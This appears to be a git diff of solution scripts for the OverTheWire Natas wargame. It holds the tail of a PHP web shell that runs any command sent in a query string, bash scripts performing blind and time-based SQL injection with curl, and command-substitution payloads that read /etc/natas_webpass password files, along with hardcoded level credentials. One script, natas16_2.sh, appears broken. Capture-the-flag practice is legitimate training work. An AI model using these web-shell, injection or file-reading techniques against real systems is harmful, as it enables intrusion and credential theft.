+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd'] . ' 2>&1');
+    }
+?>
+</pre>
+</body>
+</html>

overthewire/natas/scripts/natas15.sh

@@ -0,0 +1,90 @@
+#!/usr/bin/env bash
+
+req() {
+  curl http://natas15.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \
+       -d "username=natas16\" and $1 -- " \
+       -sS \
+    | grep exists &>/dev/null
+}
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  req "length(password)$1"
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s - %-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"

overthewire/natas/scripts/natas16.sh

@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)'
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$1" \
+       -sS \
+    | grep --after-context 2 "<pre>" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+

overthewire/natas/scripts/natas16_2.sh

@@ -0,0 +1,70 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$2" \
+       -sS \
+    | grep --after-context 2 "<pre>"
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"

overthewire/natas/scripts/natas17.sh

@@ -0,0 +1,108 @@
+#!/usr/bin/env bash
+
+USERNAME="natas17"
+PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
+TARGET="natas18"
+
+DELAY=4
+PREFIX="5mxv8BZZVSMzzYPcY95M9m"
+
+req() {
+  CMD=$@
+  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
+       -X POST \
+       -u "$USERNAME:$PASSWORD" \
+       -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
+       -sS &>/dev/null
+}
+
+time_req() (
+  export STAT
+  export CMD="$@"
+  (time (req $CMD; STAT=$?)) \
+    |& grep real \
+    |  awk '{print substr($2, 3, 1)}'
+  return $STAT
+)
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  ELAPSED=$(time_req "LENGTH(password)$1")
+  return $(( ELAPSED < DELAY ))
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s-%-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
+  return $(( ELAPSED < DELAY ))
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          local NEWCHAR
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            NEWCHAR=${chars:MIN-1:1}
+          else
+            NEWCHAR=${chars:MAX-1:1}
+          fi
+          PREFIX="$PREFIX$NEWCHAR"
+          echo -e "[+] Update: $NEWCHAR -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"

overthewire/order

@@ -0,0 +1,2 @@
+bandit - linux essentials
+natas  - web shtuff